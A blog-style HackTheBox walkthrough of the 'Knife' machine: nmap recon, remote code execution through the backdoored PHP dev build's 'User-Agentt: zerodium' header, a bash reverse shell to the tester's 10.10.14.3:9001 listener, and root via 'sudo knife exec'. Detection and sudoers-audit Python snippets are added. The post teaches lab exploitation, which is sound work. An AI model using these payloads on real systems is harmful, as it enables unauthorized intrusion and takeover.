HackTheBox — Knife Walkthrough

Mainul Hasan
5 min read · Sep 12, 2021
Knife
Info Card

Summary

This is a write-up for a fairly easy Linux machine from hackthebox.eu named Knife. This box is a great first box to pwn if you are new to HackTheBox. It runs a development build of PHP behind its web server, and that build contains a backdoor which we use to get the initial foothold; from there we look around and escalate our privileges to root. So, let's jump in.

Recon

We start with an nmap scan to discover the open ports. I find the script below pretty helpful when doing CTFs: it runs a full port scan quickly, then runs a second nmap against only the open ports with the default scripts and the version detection flag. It is taken from the Starting Point module on HackTheBox; you can find it there, or visit this link to my repository to check out the script. The version here is slightly modified to store the outputs in an nmap folder.

ports=$(nmap -p- --min-rate=1000 -T4 -oA nmap/knife_open_ports 10.10.10.242 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -sC -sV -p$ports -oA nmap/knife 10.10.10.242

Looking at the results:

# Nmap 7.91 scan initiated Sun Sep 12 05:42:33 2021 as: nmap -sC -sV -p22,80 -oA nmap/knife 10.10.10.242
Nmap scan report for 10.10.10.242
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 12 05:42:45 2021 -- 1 IP address (1 host up) scanned in 11.58 seconds

We can see only two open ports: 22 and 80.

SSH

The port 22 banner leaks the OpenSSH version along with the platform, which is Ubuntu. Checking this OpenSSH version on the web shows that it is not affected by any known vulnerabilities.

HTTP

Let’s have a look at port 80:

Port 80

We can see a static website. After looking at the source code, it doesn't leak any kind of CMS data. It seems to be a static page.

Adding index.html, index.php at the end of the URL:

http://10.10.10.242/index.php
http://10.10.10.242/index.html

From the outputs, we can tell that the application supports the PHP extension. We can now use this information when starting our gobuster scan.

gobuster dir -u http://10.10.10.242/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -o initial.crawl -t 20 -x php

While the gobuster is running let us check the request and response in BurpSuite:

BurpSuite Repeater

We can see that the server header leaks the PHP version. Let's search for it on Google and see if anything interesting comes up.

Google Search Results

Looking at the results, we can see that there is a backdoor that allows us to perform remote code execution.

There is an exploit-db exploit which we can run. We can also look at the blogs to see how it works. This blog by flast101 explains it really well. I recommend reading it to get a better understanding.

Two malicious commits were pushed to the PHP Git code repo on Sunday, March 28, and signed off under the names of PHP creator, Rasmus Lerdorf, and maintainer Nikita Popov.

In the malicious commits, the attackers published a mysterious change upstream, “fix typo” under the pretense this was a minor typographical correction.

However, taking a look at the added line 370 where zend_eval_string function is called, the code actually plants a backdoor for obtaining easy Remote Code Execution (RCE) on a website running this hijacked version of PHP. This line executes PHP code from within the useragent HTTP header, if the string starts with ‘zerodium’.
Zerodium is a Washington-based security firm that specializes in buying and selling zero-day vulnerabilities for a variety of operating systems and popular desktop and Web applications, including for PHP itself.

Our gobuster scan doesn't give us much.

Initial Foothold

To exploit it, we send the request from Repeater, rename the User-Agent header to User-Agentt, and add our payload as its value.

User-Agentt: zerodiumsystem('id');

After we send the payload we can see that the remote code is executed, and we get the output.

RCE obtained
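A defender-side counterpart to what the write-up just demonstrated, as an added example that is not part of the original post: the backdoor described above evaluates PHP from a request header whose value carries the "zerodium" marker, and the write-up triggers it through the misspelled User-Agentt header. A reverse proxy, WAF rule or request-logging pipeline can flag both conditions before a request reaches PHP. The helper names (parse_request_headers, inspect_request) and the two sample requests are my own constructions; the checker looks for the marker anywhere in a header value, which is at least as strict as the start-of-string check the text describes.

```python
"""Header-level detection for the PHP 'zerodium' backdoor trigger.

Added example, not code from the write-up. Sample requests are constructed.
"""
from typing import Dict, List, Tuple

TRIGGER_MARKER = "zerodium"       # marker the backdoored build looks for
SUSPECT_HEADER = "user-agentt"    # misspelled header name used in the write-up


def parse_request_headers(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP/1.x request head into (request line, headers).

    Header names are lower-cased; a repeated header keeps the last value,
    which is enough for this check. Accepts CRLF or LF line endings.
    """
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    request_line = lines[0]
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line, headers


def inspect_request(raw: str) -> List[str]:
    """Return findings for one raw request; an empty list means nothing suspicious."""
    _, headers = parse_request_headers(raw)
    findings: List[str] = []
    # Condition 1: the misspelled header the backdoor reads is present at all.
    if SUSPECT_HEADER in headers:
        findings.append(f"misspelled header '{SUSPECT_HEADER}' present")
    # Condition 2: any header value carries the trigger marker.
    for name, value in headers.items():
        if TRIGGER_MARKER in value.lower():
            findings.append(f"header '{name}' contains '{TRIGGER_MARKER}'")
    return findings


# Constructed sample requests (not captured traffic).
BENIGN_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: 10.10.10.242\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)
TRIGGER_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: 10.10.10.242\r\n"
    "User-Agentt: zerodiumsystem('id');\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, raw in (("benign", BENIGN_REQUEST), ("trigger", TRIGGER_REQUEST)):
        print(label, inspect_request(raw))
```

The header check is only a compensating control: the durable fix for a host running the hijacked build is to replace the PHP build with a clean release, and the check above is there to catch attempts while that happens.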

Let's try to get a reverse shell. We set up our netcat listener on port 9001.

Listening on port 9001

Let us send the reverse shell via the payload:

User-Agentt: zerodiumsystem("bash -c 'bash -i >& /dev/tcp/10.10.14.3/9001 0>&1'");

Burp Request

And we get a shell back.

Reverse Shell

Now, we upgrade our shell to a proper tty, and we can see that we are james.

tty as james

Enumeration

Now, we can focus on escalating our privileges.

Let's check if james can run any command with sudo. We can see that james can run knife as sudo.

sudo -l output

Let's check GTFOBins to see if there is anything interesting for knife.

We can see from the GTFOBins entry that if we can run knife as sudo, we can escalate our privileges.

knife gtfobins

Let’s try that

Privilege Escalation

We run the following command:

sudo knife exec -E 'exec "/bin/sh"'

Voila! We are root.

shell as root
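The rule that made this escalation possible is a single sudoers entry, so the defender's check is an audit of sudoers rules for binaries whose GTFOBins entry documents a shell escape. Below is an added example (not from the write-up) that parses sudoers-style user specifications, the format behind the sudo -l output above, and flags any rule granting such a binary; knife comes from this box, and the watch list is an assumption you would extend from GTFOBins for a real audit. The function names (parse_sudoers_line, audit_sudoers) and the sample sudoers text are my own constructions.

```python
"""Audit sudoers user specifications for shell-escape-capable binaries.

Added example, not code from the write-up. Sample rules are constructed.
"""
import os
import re
from typing import Dict, List, Optional

# Binaries whose GTFOBins entry documents a shell escape under sudo.
# 'knife' comes from this box; extending the set is left to the reader (assumption).
SHELL_ESCAPE_BINARIES = {"knife"}

# user  host = (runas) TAG: cmd, cmd   (runas and tags are optional)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<commands>.+)$"
)


def parse_sudoers_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one user specification; return None for blanks, comments,
    Defaults lines and alias definitions."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#") or stripped.startswith("Defaults"):
        return None
    if stripped.split()[0].endswith("_Alias"):  # User_Alias, Cmnd_Alias, ...
        return None
    m = RULE_RE.match(stripped)
    if not m:
        return None
    tags = [t.rstrip(":") for t in m.group("tags").split() if t.endswith(":")]
    commands = [c.strip() for c in m.group("commands").split(",") if c.strip()]
    return {
        "user": m.group("user"),
        "host": m.group("host"),
        "runas": m.group("runas") or "root",  # sudo's default target user
        "tags": tags,
        "commands": commands,
    }


def audit_sudoers(text: str) -> List[Dict[str, object]]:
    """Return one finding per granted command whose binary is on the watch list."""
    findings: List[Dict[str, object]] = []
    for line in text.splitlines():
        rule = parse_sudoers_line(line)
        if rule is None:
            continue
        for cmd in rule["commands"]:
            binary = os.path.basename(cmd.split()[0])
            if binary in SHELL_ESCAPE_BINARIES:
                findings.append({
                    "user": rule["user"],
                    "runas": rule["runas"],
                    "command": cmd,
                    "binary": binary,
                    "nopasswd": "NOPASSWD" in rule["tags"],
                })
    return findings


# Constructed sample, not the box's real /etc/sudoers.
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
james ALL=(ALL) NOPASSWD: /usr/bin/knife
"""

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
```

A rule that is flagged here should either be removed or narrowed to the specific sub-commands the user actually needs, since a wildcard grant on the binary is what lets knife's exec sub-command turn into a root shell.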

Flags

# cat root.txt
93565db39d2077f07dd902....713c0
# cat /home/james/user.txt
280d22fe89a681e532be875....6c691
Trophy

Hope you liked this write-up.

~m1kU
